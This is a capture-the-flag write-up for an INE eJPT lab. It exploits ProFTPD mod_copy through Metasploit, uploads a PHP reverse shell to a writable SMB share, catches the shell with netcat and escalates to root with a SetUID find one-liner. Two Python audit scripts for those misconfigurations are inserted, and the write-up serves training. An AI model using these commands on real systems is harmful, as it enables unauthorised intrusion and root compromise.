eJPT - Host & Network Penetration Testing: Exploitation CTF 3
Lab Environment
Two machines are accessible at target1.ine.local and target2.ine.local. Enumerate the targets, identify and exploit the misconfigurations or vulnerabilities to capture the flags. The flag is in an md5 hash format.
- Flag 1: A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
- Flag 2: Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
- Flag 3: A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
- Flag 4: Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
Tools
- Metasploit
- Nmap
- Python3
- Netcat
- smbmap
- smbclient
- Netstat
Flag 1:
A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
We'll start with the information gathering phase using Nmap. Here is what we managed to get from target1.ine.local.
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 20:31 IST
Nmap scan report for target1.ine.local (192.131.172.3)
Host is up (0.000026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 02:42:C0:83:AC:03 (Unknown)
Service Info: OS: Unix
Not much to find here, so let's start with FTP by searching for a vulnerability in this ProFTPD version with msfconsole. We need to set SITEPATH to /var/www/html because the document root of the website is located there.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhost target1.ine.local
rhost => target1.ine.local
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set lhost 192.131.172.2
lhost => 192.131.172.2
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
sitepath => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.131.172.2:4444
[*] 192.131.172.3:80 - 192.131.172.3:21 - Connected to FTP server
[*] 192.131.172.3:80 - 192.131.172.3:21 - Sending copy commands to FTP server
[*] 192.131.172.3:80 - Executing PHP payload /Fad5Zni.php
[-] 192.131.172.3:80 - Unable to delete /var/www/html/Fad5Zni.php
[*] Command shell session 1 opened (192.131.172.2:4444 -> 192.131.172.3:45816) at 2025-05-31 20:42:12 +0530
[-] 192.131.172.3:80 - Exploit aborted due to failure: unknown: 192.131.172.3:21 - Failure executing payload
[!] 192.131.172.3:80 - This exploit may require manual cleanup of '/var/www/html/Fad5Zni.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.131.172.2:4444 -> 192.131.172.3:45816 (192.131.172.3)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.131.172.2:4433
[*] Sending stage (1017704 bytes) to 192.131.172.3
[*] Meterpreter session 2 opened (192.131.172.2:4433 -> 192.131.172.3:51648) at 2025-05-31 20:42:59 +0530
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.131.172.2:4444 -> 192.131.172.3:45816 (192.131.172.3)
2 meterpreter x86/linux www-data @ target1.ine.local 192.131.172.2:4433 -> 192.131.172.3:51648 (192.131.172.3)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : target1.ine.local
OS : Ubuntu 20.04 (Linux 6.8.0-40-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > cd /
meterpreter > dir
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 0 fil 2025-05-31 20:29:21 +0530 .dockerenv
040755/rwxr-xr-x 12288 dir 2024-11-19 13:22:02 +0530 bin
040755/rwxr-xr-x 4096 dir 2020-04-15 16:39:51 +0530 boot
040755/rwxr-xr-x 340 dir 2025-05-31 20:29:21 +0530 dev
040755/rwxr-xr-x 4096 dir 2025-05-31 20:29:21 +0530 etc
100644/rw-r--r-- 80 fil 2025-05-31 20:29:21 +0530 flag1.txt
040755/rwxr-xr-x 4096 dir 2020-04-15 16:39:51 +0530 home
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:57 +0530 lib
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:31 +0530 lib32
040755/rwxr-xr-x 4096 dir 2024-10-11 07:39:13 +0530 lib64
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:31 +0530 libx32
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 media
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 mnt
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 opt
040555/r-xr-xr-x 0 dir 2025-05-31 20:29:21 +0530 proc
040755/rwxr-xr-x 4096 dir 2024-11-19 13:22:58 +0530 proftpd-1.3.5
040700/rwx------ 4096 dir 2024-10-11 07:39:22 +0530 root
040755/rwxr-xr-x 4096 dir 2025-05-31 20:29:23 +0530 run
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:42 +0530 sbin
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 srv
040555/r-xr-xr-x 0 dir 2024-10-17 17:52:10 +0530 sys
041777/rwxrwxrwx 4096 dir 2025-05-31 20:43:01 +0530 tmp
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 usr
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:30 +0530 var
meterpreter > cat flag1.txt
FLAG1{dd00901f10634a13832************}
Remember, the magical word is 'letmein'
meterpreter >
Flag 2:
Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
For this we'll enumerate the local services running on the target1 machine and take a look at port 8888, using the credential we found in flag1.
meterpreter > netstat -tuln 127.0.0.1
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 127.0.0.1:8888 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.11:45289 0.0.0.0:* LISTEN 65534 0
tcp 0.0.0.0:21 0.0.0.0:* LISTEN 65534 0
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0
tcp 192.131.172.3:80 192.131.172.2:45167 CLOSE_WAIT 33 0
tcp 192.131.172.3:51648 192.131.172.2:4433 ESTABLISHED 33 0
tcp 192.131.172.3:45816 192.131.172.2:4444 ESTABLISHED 33 0
udp 127.0.0.11:49631 0.0.0.0:* 65534 0
meterpreter > shell
Process 89 created.
Channel 3 created.
nc 127.0.0.1 8888
Enter the secret passphrase: letmein
FLAG2{2fe2f4c3ff78437195a48259b*******}
Flag 3:
A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
Let's start with the information gathering phase using Nmap. Here are the results.
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 21:32 IST
Nmap scan report for target2.ine.local (192.245.33.4)
Host is up (0.000034s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Can you Pwn me?
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:C0:F5:21:04 (Unknown)
Host script results:
|_nbstat: NetBIOS name: TARGET2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-31T16:02:29
|_ start_date: N/A
Now that we have found the services running on the target2 machine (Samba and Apache), let's dig in with enum4linux. It found a share, so we'll connect to it using smbclient. After navigating it, it seems the files stored here can be accessed through site-share. Now that we have access, we'll upload a shell to site-uploads and access it from there.
For this we'll use the PHP reverse shell found at /usr/share/webshells/php/php-reverse-shell.php; change the IP address and port number if required, upload it to site-uploads, then start a netcat listener to catch the connection.
enum4linux -a target2.ine.local
┌──(root㉿INE)-[~]
└─# smbclient //target2.ine.local/site-uploads
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 19 13:25:31 2024
.. D 0 Tue Nov 19 13:25:31 2024
1981311780 blocks of size 1024. 86551592 blocks available
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (1788.4 kb/s) (average 1788.4 kb/s)
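Added here as a defensive check, not part of the walkthrough: a small Python audit that parses an smb.conf and reports shares that are both guest-accessible and writable, flagging those whose path sits under the web document root (the combination that lets an uploaded PHP file be executed by Apache). The share names match the lab; the config text and the paths are constructed assumptions, since the page does not show target2's smb.conf.

```python
import configparser
from io import StringIO

# Constructed smb.conf fragment for the example (not target2's real config).
# Share names come from the walkthrough; the paths are assumed.
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
map to guest = Bad User

[site-share]
path = /var/www/html
guest ok = yes
read only = yes

[site-uploads]
path = /var/www/html/uploads
guest ok = yes
writable = yes
"""

TRUTHY = {"yes", "true", "1"}

def _flag(section, *names, default="no"):
    # Samba accepts several spellings for one option; use the first present.
    for n in names:
        if n in section:
            return section[n].strip().lower() in TRUTHY
    return default in TRUTHY

def risky_shares(conf_text, web_roots=("/var/www",)):
    """Return (share, path, under_web_root) for every share that is both
    guest-accessible and writable; under_web_root marks uploads that the
    web server will serve back, which is what turns a share into RCE."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   inline_comment_prefixes=("#", ";"))
    cp.read_file(StringIO(conf_text))
    findings = []
    for name in cp.sections():
        if name in ("global", "homes", "printers"):
            continue
        s = cp[name]
        guest = _flag(s, "guest ok", "public")
        # "read only = no" means the same as "writable = yes"
        writable = _flag(s, "writable", "writeable", "write ok") or (
            "read only" in s and not _flag(s, "read only", default="yes"))
        if guest and writable:
            path = s.get("path", "")
            findings.append((name, path, any(path.startswith(r) for r in web_roots)))
    return findings
```

On a real host, feed it open('/etc/samba/smb.conf').read(); the fix is guest ok = no or writable = no on the share, or an upload path that Apache does not serve.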
Here we got the connection back and found flag3!
┌──(root㉿INE)-[~]
└─# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.245.33.2] from (UNKNOWN) [192.245.33.4] 56918
Linux target2.ine.local 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
16:21:08 up 295 days, 11:03, 0 users, load average: 0.98, 0.57, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cat flag3.txt
FLAG3{cf56725a4e0043d1a3a02a7f8********}
$
Flag 4:
Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
Every Linux system stores the list of valid login shells in the /etc/shells file. These shells can sometimes be exploited if misconfigured.
cat /etc/shells
This command will display something like:
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/zsh
Note: The command find / -perm -4000 2>/dev/null does the following:
- find /: starts searching from the root directory /.
- -perm -4000: looks for files with the SetUID permission bit set. This bit lets users execute the file with the permissions of the file's owner.
- 2>/dev/null: suppresses error messages (e.g., permission denied) by redirecting them to /dev/null, effectively ignoring them.
$ find / -exec /bin/rbash -p \; -quit
whoami
root
cat /root/flag4.txt
FLAG4{d1038e2989e8427fb283b6************}
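The final command only yields root because find itself carries the SetUID bit on target2 (the output of the find / -perm -4000 search is not shown above). Added here, and not part of the original walkthrough, is a Python audit that does what that search does and then reports SUID-root files that are not in an expected baseline, so a defender sees /usr/bin/find stand out; the baseline list and the sample entries are constructed assumptions.

```python
import os
import stat

# Assumed, abbreviated baseline of SUID-root binaries normally present on
# Ubuntu; build your own from a clean image of the same release.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd",
}

def unexpected_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, st_mode, st_uid). Return the paths that are
    regular files, SUID, owned by root (uid 0) and not in the baseline."""
    hits = []
    for path, mode, uid in entries:
        if stat.S_ISREG(mode) and (mode & stat.S_ISUID) and uid == 0:
            if path not in expected:
                hits.append(path)
    return sorted(hits)

def walk_suid(root="/"):
    """Live equivalent of `find / -perm -4000 2>/dev/null`: yield
    (path, mode, uid) for every regular file, skipping pseudo-filesystems
    and anything we cannot stat (the part the 2>/dev/null hides)."""
    skip = ("/proc", "/sys", "/dev")
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for f in filenames:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            yield p, st.st_mode, st.st_uid

# Constructed sample standing in for a scan of target2 (not real output).
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/find",   0o104755, 0),     # SetUID find: the walkthrough's privesc path
    ("/usr/bin/ls",     0o100755, 0),     # no SetUID bit
    ("/home/u/tool",    0o104755, 1000),  # SetUID but not root-owned
]

if __name__ == "__main__":
    print(unexpected_suid(SAMPLE_ENTRIES))   # ['/usr/bin/find']
    print(unexpected_suid(walk_suid()))      # live scan; run as root for full coverage
```

Removing the bit (chmod u-s /usr/bin/find) closes this path; the live walk_suid() scan needs root to stat every directory, which is also why the page's one-liner silences stderr.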